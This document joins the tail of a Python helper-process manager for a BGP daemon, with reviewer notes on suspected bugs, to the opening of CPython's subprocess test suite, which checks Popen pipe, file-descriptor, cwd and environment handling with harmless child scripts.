            if process not in configuration:
                self._terminate(process)
        self._configuration = configuration
        for process in configuration:
            if restart and process in list(self._process):
                self._terminate(process)
            self._start(process)
    def broken(self, neighbor):
        """Return True when any configured helper is marked broken.

        NOTE(review): the `neighbor` argument is never used -- presumably
        kept for API symmetry; confirm against callers.
        """
        if self._broken:
            for process in self._configuration:
                if process in self._broken:
                    return True
        return False
    def _update_fds(self):
        """Refresh the cached list of helper stdout file descriptors."""
        self.fds = [self._process[process].stdout.fileno() for process in self._process]
    def received(self):
        """Generator: drain every helper's stdout and yield complete lines.

        Yields (process_name, formated_line) tuples.  Dead or hung-up
        helpers detected along the way are handed to _handle_problem().
        """
        consumed_data = False
        for process in list(self._process):
            try:
                proc = self._process[process]
                poll = proc.poll()
                # poll the pipe with a zero timeout: never block the loop
                poller = select.poll()
                poller.register(
                    proc.stdout, select.POLLIN | select.POLLPRI | select.POLLHUP | select.POLLNVAL | select.POLLERR
                )
                ready = False
                for _, event in poller.poll(0):
                    if event & select.POLLIN or event & select.POLLPRI:
                        ready = True
                    elif event & select.POLLHUP or event & select.POLLERR or event & select.POLLNVAL:
                        self._handle_problem(process)
                if not ready:
                    continue
                try:
                    # Calling next() on Linux and OSX works perfectly well
                    # but not on OpenBSD where it always raise StopIteration
                    # and only read() works (not even readline)
                    buf = str_ascii(proc.stdout.read(16384))
                    if buf == '' and poll is not None:
                        # if proc.poll() is None then
                        # process is fine, we received an empty line because
                        # we're doing .read() on a non-blocking pipe and
                        # the process maybe has nothing to send yet
                        self._handle_problem(process)
                        continue
                    # keep the incomplete trailing line buffered per process
                    raw = self._buffer.get(process, '') + buf
                    while '\n' in raw:
                        line, raw = raw.split('\n', 1)
                        line = line.rstrip()
                        consumed_data = True
                        self.logger.debug('command from process %s : %s ' % (process, line), 'process')
                        yield (process, formated(line))
                    self._buffer[process] = raw
                except IOError as exc:
                    if not exc.errno or exc.errno in error.fatal:
                        # if the program exits we can get an IOError with errno code zero !
                        self._handle_problem(process)
                    elif exc.errno in error.block:
                        # we often see errno.EINTR: call interrupted and
                        # we most likely have data, we will try to read them a the next loop iteration
                        pass
                    else:
                        self.logger.debug('unexpected errno received from forked process (%s)' % errstr(exc), 'process')
                    continue
                except StopIteration:
                    if not consumed_data:
                        self._handle_problem(process)
                    continue
                # proc.poll returns None if the process is still fine
                # -[signal], like -15, if the process was terminated
                if poll is not None:
                    self._handle_problem(process)
                    return
            except KeyError:
                pass
            except (subprocess.CalledProcessError, OSError, ValueError):
                self._handle_problem(process)
    def write(self, process, string, neighbor=None):
        """Send one line to a helper's stdin; returns True on success.

        Retries transient IO errors; raises ProcessError on EPIPE.
        """
        if string is None:
            return True
        # XXX: FIXME: This is potentially blocking
        while True:
            try:
                self._process[process].stdin.write(bytes_ascii('%s\n' % string))
            except IOError as exc:
                # NOTE(review): this append runs for *every* IOError, so a
                # retryable error still marks the process broken, and on
                # EPIPE the name is appended twice -- looks unintended;
                # confirm before relying on self._broken's contents.
                self._broken.append(process)
                if exc.errno == errno.EPIPE:
                    self._broken.append(process)
                    self.logger.debug('issue while sending data to our helper program', 'process')
                    raise ProcessError()
                else:
                    # Could it have been caused by a signal ? What to do.
                    self.logger.debug(
                        'error received while sending data to helper program, retrying (%s)' % errstr(exc), 'process'
                    )
                    continue
            break
        try:
            self._process[process].stdin.flush()
        except IOError as exc:
            # AFAIK, the buffer should be flushed at the next attempt.
            self.logger.debug(
                'error received while FLUSHING data to helper program, retrying (%s)' % errstr(exc), 'process'
            )
        return True
    def _answer(self, service, string, force=False):
        """Write an answer back to `service`, honouring the api.ack setting."""
        if force or self.ack:
            self.logger.debug('responding to %s : %s' % (service, string.replace('\n', '\\n')), 'process')
            self.write(service, string)
    def answer_done(self, service):
        self._answer(service, Answer.done)
    def answer_error(self, service):
        self._answer(service, Answer.error)
    def _notify(self, neighbor, event):
        """Yield the names of the helpers subscribed to `event` for this neighbor."""
        for process in neighbor.api[event]:
            yield process
    # do not do anything if silenced
    # no-self-argument
    def silenced(function):
        # decorator: turn the notifier into a no-op once self.silence is set
        def closure(self, *args):
            if self.silence:
                return
            return function(self, *args)
        return closure
    # invalid-name
    @silenced
    def up(self, neighbor):
        for process in self._notify(neighbor, 'neighbor-changes'):
            self.write(process, self._encoder[process].up(neighbor), neighbor)
    @silenced
    def connected(self, neighbor):
        for process in self._notify(neighbor, 'neighbor-changes'):
            self.write(process, self._encoder[process].connected(neighbor), neighbor)
    @silenced
    def down(self, neighbor, reason):
        for process in self._notify(neighbor, 'neighbor-changes'):
            self.write(process, self._encoder[process].down(neighbor, reason), neighbor)
    @silenced
    def negotiated(self, neighbor, negotiated):
        for process in self._notify(neighbor, 'negotiated'):
            self.write(process, self._encoder[process].negotiated(neighbor, negotiated), neighbor)
    @silenced
    def fsm(self, neighbor, fsm):
        for process in self._notify(neighbor, 'fsm'):
            self.write(process, self._encoder[process].fsm(neighbor, fsm), neighbor)
    @silenced
    def signal(self, neighbor, signal):
        for process in self._notify(neighbor, 'signal'):
            self.write(process, self._encoder[process].signal(neighbor, signal), neighbor)
    @silenced
    def packets(self, neighbor, direction, category, negotiated, header, body):
        for process in self._notify(neighbor, '%s-packets' % direction):
            self.write(
                process,
                self._encoder[process].packets(neighbor, direction, category, negotiated, header, body),
                neighbor,
            )
    @silenced
    def notification(self, neighbor, direction, code, subcode, data, header, body):
        for process in self._notify(neighbor, 'neighbor-changes'):
            self.write(
                process,
                self._encoder[process].notification(neighbor, direction, code, subcode, data, header, body),
                neighbor,
            )
    @silenced
    def message(self, message_id, neighbor, direction, message, negotiated, header, *body):
        # dispatch to the per-message-type handler registered below
        self._dispatch[message_id](self, neighbor, direction, message, negotiated, header, *body)
    # registering message functions
    # no-self-argument
    def register_process(message_id, storage=_dispatch):
        # decorator factory: record the wrapped handler in the class-level
        # _dispatch table under its BGP message code
        def closure(function):
            def wrap(*args):
                function(*args)
            storage[message_id] = wrap
            return wrap
        return closure
    # notifications are handled in the loop as they use different arguments
    @register_process(Message.CODE.OPEN)
    def _open(self, peer, direction, message, negotiated, header, body):
        for process in self._notify(peer, '%s-%s' % (direction, Message.CODE.OPEN.SHORT)):
            self.write(process, self._encoder[process].open(peer, direction, message, negotiated, header, body), peer)
    @register_process(Message.CODE.UPDATE)
    def _update(self, peer, direction, update, negotiated, header, body):
        for process in self._notify(peer, '%s-%s' % (direction, Message.CODE.UPDATE.SHORT)):
            self.write(process, self._encoder[process].update(peer, direction, update, negotiated, header, body), peer)
    @register_process(Message.CODE.NOTIFICATION)
    def _notification(self, peer, direction, message, negotiated, header, body):
        for process in self._notify(peer, '%s-%s' % (direction, Message.CODE.NOTIFICATION.SHORT)):
            self.write(
                process, self._encoder[process].notification(peer, direction, message, negotiated, header, body), peer
            )
    # unused-argument, must keep the API
    @register_process(Message.CODE.KEEPALIVE)
    def _keepalive(self, peer, direction, keepalive, negotiated, header, body):
        for process in self._notify(peer, '%s-%s' % (direction, Message.CODE.KEEPALIVE.SHORT)):
            self.write(process, self._encoder[process].keepalive(peer, direction, negotiated, header, body), peer)
    @register_process(Message.CODE.ROUTE_REFRESH)
    def _refresh(self, peer, direction, refresh, negotiated, header, body):
        for process in self._notify(peer, '%s-%s' % (direction, Message.CODE.ROUTE_REFRESH.SHORT)):
            self.write(
                process, self._encoder[process].refresh(peer, direction, refresh, negotiated, header, body), peer
            )
    @register_process(Message.CODE.OPERATIONAL)
    def _operational(self, peer, direction, operational, negotiated, header, body):
        for process in self._notify(peer, '%s-%s' % (direction, Message.CODE.OPERATIONAL.SHORT)):
            self.write(
                process,
                self._encoder[process].operational(
                    peer, direction, operational.category, operational, negotiated, header, body
                ),
                peer,
            )
|
test_subprocess.py | import unittest
from unittest import mock
from test import support
import subprocess
import sys
import platform
import signal
import io
import itertools
import os
import errno
import tempfile
import time
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
from test.support import FakePath
try:
import ctypes
except ImportError:
ctypes = None
else:
import ctypes.util
try:
import _testcapi
except ImportError:
_testcapi = None
# Module-level configuration for the subprocess test suite.
if support.PGO:
    raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
    # code snippet prepended to child scripts so their stdout is binary
    SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
                 'os.O_BINARY);')
else:
    SETBINARY = ''
# command that is expected not to exist on any test machine
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
class BaseTestCase(unittest.TestCase):
    """Common setup/teardown for subprocess tests.

    Keeps the interpreter's child-process bookkeeping clean so that a test
    which leaks a child fails itself rather than a later test.
    """
    def setUp(self):
        # Try to minimize the number of children we have so this test
        # doesn't crash on some buildbots (Alphas in particular).
        support.reap_children()
    def tearDown(self):
        # Reap any Popen objects still registered in subprocess's
        # module-level bookkeeping, then assert none remain: a non-empty
        # _active list means a test leaked a child process.
        for inst in subprocess._active:
            inst.wait()
        subprocess._cleanup()
        self.assertFalse(subprocess._active, "subprocess._active not empty")
        self.doCleanups()
        support.reap_children()
    def assertStderrEqual(self, stderr, expected, msg=None):
        """Compare child stderr to `expected`, ignoring interpreter noise."""
        # In a debug build, stuff like "[6580 refs]" is printed to stderr at
        # shutdown time. That frustrates tests trying to check stderr produced
        # from a spawned Python process.
        actual = support.strip_python_stderr(stderr)
        # strip_python_stderr also strips whitespace, so we do too.
        expected = expected.strip()
        self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
    """Marker exception raised on purpose by test Popen subclasses."""
    pass
class PopenExecuteChildRaises(subprocess.Popen):
    """Popen subclass for testing cleanup of subprocess.PIPE filehandles when
    _execute_child fails.
    """
    def _execute_child(self, *args, **kwargs):
        # Always fail before a child is ever spawned, so tests can verify
        # that Popen.__init__ closes the pipes it already created.
        raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=FakePath(temp_dir))
    @unittest.skipIf(mswindows, "pending resolution of issue #15533")
    def test_cwd_with_relative_arg(self):
        """A relative args[0] is resolved against cwd=, not the parent's cwd."""
        # Check that Popen looks for args[0] relative to cwd if args[0]
        # is relative.
        python_dir, python_base = self._split_python_path()
        rel_python = os.path.join(os.curdir, python_base)
        with support.temp_cwd() as wrong_dir:
            # Before calling with the correct cwd, confirm that the call fails
            # without cwd and with the wrong cwd.
            self.assertRaises(FileNotFoundError, subprocess.Popen,
                              [rel_python])
            self.assertRaises(FileNotFoundError, subprocess.Popen,
                              [rel_python], cwd=wrong_dir)
            python_dir = self._normalize_cwd(python_dir)
            self._assert_cwd(python_dir, rel_python, cwd=python_dir)
    @unittest.skipIf(mswindows, "pending resolution of issue #15533")
    def test_cwd_with_relative_executable(self):
        """A relative executable= is resolved against cwd= and beats args[0]."""
        # Check that Popen looks for executable relative to cwd if executable
        # is relative (and that executable takes precedence over args[0]).
        python_dir, python_base = self._split_python_path()
        rel_python = os.path.join(os.curdir, python_base)
        doesntexist = "somethingyoudonthave"
        with support.temp_cwd() as wrong_dir:
            # Before calling with the correct cwd, confirm that the call fails
            # without cwd and with the wrong cwd.
            self.assertRaises(FileNotFoundError, subprocess.Popen,
                              [doesntexist], executable=rel_python)
            self.assertRaises(FileNotFoundError, subprocess.Popen,
                              [doesntexist], executable=rel_python,
                              cwd=wrong_dir)
            python_dir = self._normalize_cwd(python_dir)
            self._assert_cwd(python_dir, doesntexist, executable=rel_python,
                             cwd=python_dir)
    def test_cwd_with_absolute_arg(self):
        """An absolute args[0] is found even when cwd= points elsewhere."""
        # Check that Popen can find the executable when the cwd is wrong
        # if args[0] is an absolute path.
        python_dir, python_base = self._split_python_path()
        abs_python = os.path.join(python_dir, python_base)
        rel_python = os.path.join(os.curdir, python_base)
        with support.temp_dir() as wrong_dir:
            # Before calling with an absolute path, confirm that using a
            # relative path fails.
            self.assertRaises(FileNotFoundError, subprocess.Popen,
                              [rel_python], cwd=wrong_dir)
            wrong_dir = self._normalize_cwd(wrong_dir)
            self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
    @unittest.skipIf(sys.base_prefix != sys.prefix,
                     'Test is not venv-compatible')
    def test_executable_with_cwd(self):
        """An absolute executable= works regardless of a bogus args[0]."""
        python_dir, python_base = self._split_python_path()
        python_dir = self._normalize_cwd(python_dir)
        self._assert_cwd(python_dir, "somethingyoudonthave",
                         executable=sys.executable, cwd=python_dir)
    @unittest.skipIf(sys.base_prefix != sys.prefix,
                     'Test is not venv-compatible')
    @unittest.skipIf(sysconfig.is_python_build(),
                     "need an installed Python. See #7774")
    def test_executable_without_cwd(self):
        """An absolute executable= works without any cwd= argument."""
        # For a normal installation, it should work without 'cwd'
        # argument. For test runs in the build directory, see #7774.
        self._assert_cwd(os.getcwd(), "somethingyoudonthave",
                         executable=sys.executable)
    def test_stdin_pipe(self):
        """Child reads stdin from a PIPE; exit code 1 == child saw 'pear'."""
        # stdin redirection
        p = subprocess.Popen([sys.executable, "-c",
                         'import sys; sys.exit(sys.stdin.read() == "pear")'],
                        stdin=subprocess.PIPE)
        p.stdin.write(b"pear")
        p.stdin.close()
        p.wait()
        # sys.exit(True) maps to exit status 1.
        self.assertEqual(p.returncode, 1)
    def test_stdin_filedes(self):
        """Child stdin can be an open file descriptor (int)."""
        # stdin is set to open file descriptor
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        d = tf.fileno()
        os.write(d, b"pear")
        # Rewind so the child reads from the start of the file.
        os.lseek(d, 0, 0)
        p = subprocess.Popen([sys.executable, "-c",
                         'import sys; sys.exit(sys.stdin.read() == "pear")'],
                         stdin=d)
        p.wait()
        self.assertEqual(p.returncode, 1)
    def test_stdin_fileobj(self):
        """Child stdin can be an open file object."""
        # stdin is set to open file object
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        tf.write(b"pear")
        tf.seek(0)
        p = subprocess.Popen([sys.executable, "-c",
                         'import sys; sys.exit(sys.stdin.read() == "pear")'],
                         stdin=tf)
        p.wait()
        self.assertEqual(p.returncode, 1)
    def test_stdout_pipe(self):
        """Child stdout is captured through a PIPE."""
        # stdout redirection
        p = subprocess.Popen([sys.executable, "-c",
                          'import sys; sys.stdout.write("orange")'],
                         stdout=subprocess.PIPE)
        with p:
            self.assertEqual(p.stdout.read(), b"orange")
    def test_stdout_filedes(self):
        """Child stdout can be an open file descriptor (int)."""
        # stdout is set to open file descriptor
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        d = tf.fileno()
        p = subprocess.Popen([sys.executable, "-c",
                          'import sys; sys.stdout.write("orange")'],
                         stdout=d)
        p.wait()
        # Rewind and read back what the child wrote.
        os.lseek(d, 0, 0)
        self.assertEqual(os.read(d, 1024), b"orange")
    def test_stdout_fileobj(self):
        """Child stdout can be an open file object."""
        # stdout is set to open file object
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        p = subprocess.Popen([sys.executable, "-c",
                          'import sys; sys.stdout.write("orange")'],
                         stdout=tf)
        p.wait()
        tf.seek(0)
        self.assertEqual(tf.read(), b"orange")
    def test_stderr_pipe(self):
        """Child stderr is captured through a PIPE."""
        # stderr redirection
        p = subprocess.Popen([sys.executable, "-c",
                          'import sys; sys.stderr.write("strawberry")'],
                         stderr=subprocess.PIPE)
        with p:
            self.assertStderrEqual(p.stderr.read(), b"strawberry")
    def test_stderr_filedes(self):
        """Child stderr can be an open file descriptor (int)."""
        # stderr is set to open file descriptor
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        d = tf.fileno()
        p = subprocess.Popen([sys.executable, "-c",
                          'import sys; sys.stderr.write("strawberry")'],
                         stderr=d)
        p.wait()
        # Rewind and read back what the child wrote.
        os.lseek(d, 0, 0)
        self.assertStderrEqual(os.read(d, 1024), b"strawberry")
    def test_stderr_fileobj(self):
        """Child stderr can be an open file object."""
        # stderr is set to open file object
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        p = subprocess.Popen([sys.executable, "-c",
                          'import sys; sys.stderr.write("strawberry")'],
                         stderr=tf)
        p.wait()
        tf.seek(0)
        self.assertStderrEqual(tf.read(), b"strawberry")
    def test_stderr_redirect_with_no_stdout_redirect(self):
        """stderr=STDOUT works in a child whose own stdout is not redirected."""
        # test stderr=STDOUT while stdout=None (not set)
        #
        # - grandchild prints to stderr
        # - child redirects grandchild's stderr to its stdout
        # - the parent should get grandchild's stderr in child's stdout
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys, subprocess;'
                              'rc = subprocess.call([sys.executable, "-c",'
                              '    "import sys;"'
                              '    "sys.stderr.write(\'42\')"],'
                              '    stderr=subprocess.STDOUT);'
                              'sys.exit(rc)'],
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        stdout, stderr = p.communicate()
        #NOTE: stdout should get stderr from grandchild
        self.assertStderrEqual(stdout, b'42')
        self.assertStderrEqual(stderr, b'') # should be empty
        self.assertEqual(p.returncode, 0)
    def test_stdout_stderr_pipe(self):
        """stderr=STDOUT merges both streams into the single stdout PIPE."""
        # capture stdout and stderr to the same pipe
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys;'
                              'sys.stdout.write("apple");'
                              'sys.stdout.flush();'
                              'sys.stderr.write("orange")'],
                             stdout=subprocess.PIPE,
                             stderr=subprocess.STDOUT)
        with p:
            self.assertStderrEqual(p.stdout.read(), b"appleorange")
    def test_stdout_stderr_file(self):
        """Both streams may be pointed at the same open file object."""
        # capture stdout and stderr to the same open file
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys;'
                              'sys.stdout.write("apple");'
                              'sys.stdout.flush();'
                              'sys.stderr.write("orange")'],
                             stdout=tf,
                             stderr=tf)
        p.wait()
        tf.seek(0)
        self.assertStderrEqual(tf.read(), b"appleorange")
    def test_stdout_filedes_of_stdout(self):
        """stdout=1 (the parent's own stdout fd) is accepted (#1531862)."""
        # stdout is set to 1 (#1531862).
        # To avoid printing the text on stdout, we do something similar to
        # test_stdout_none (see above). The parent subprocess calls the child
        # subprocess passing stdout=1, and this test uses stdout=PIPE in
        # order to capture and check the output of the parent. See #11963.
        code = ('import sys, subprocess; '
                'rc = subprocess.call([sys.executable, "-c", '
                '    "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
                     'b\'test with stdout=1\'))"], stdout=1); '
                'assert rc == 18')
        p = subprocess.Popen([sys.executable, "-c", code],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        self.addCleanup(p.stdout.close)
        self.addCleanup(p.stderr.close)
        out, err = p.communicate()
        self.assertEqual(p.returncode, 0, err)
        # rc == 18 is the byte count of b'test with stdout=1'.
        self.assertEqual(out.rstrip(), b'test with stdout=1')
    def test_stdout_devnull(self):
        """stdout=DEVNULL discards output and leaves p.stdout as None."""
        p = subprocess.Popen([sys.executable, "-c",
                              'for i in range(10240):'
                              'print("x" * 1024)'],
                              stdout=subprocess.DEVNULL)
        p.wait()
        self.assertEqual(p.stdout, None)
    def test_stderr_devnull(self):
        """stderr=DEVNULL discards output and leaves p.stderr as None."""
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys\n'
                              'for i in range(10240):'
                              'sys.stderr.write("x" * 1024)'],
                              stderr=subprocess.DEVNULL)
        p.wait()
        self.assertEqual(p.stderr, None)
    def test_stdin_devnull(self):
        """stdin=DEVNULL gives the child an empty stdin; p.stdin is None."""
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys;'
                              'sys.stdin.read(1)'],
                              stdin=subprocess.DEVNULL)
        p.wait()
        self.assertEqual(p.stdin, None)
    def test_env(self):
        """env= passes an explicit environment through to the child."""
        newenv = os.environ.copy()
        newenv["FRUIT"] = "orange"
        with subprocess.Popen([sys.executable, "-c",
                               'import sys,os;'
                               'sys.stdout.write(os.getenv("FRUIT"))'],
                              stdout=subprocess.PIPE,
                              env=newenv) as p:
            stdout, stderr = p.communicate()
            self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
'__PYVENV_LAUNCHER__' in n or # MacOS framework build
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
    def test_invalid_cmd(self):
        """Embedded NUL bytes in the command or its arguments raise ValueError."""
        # null character in the command name
        cmd = sys.executable + '\0'
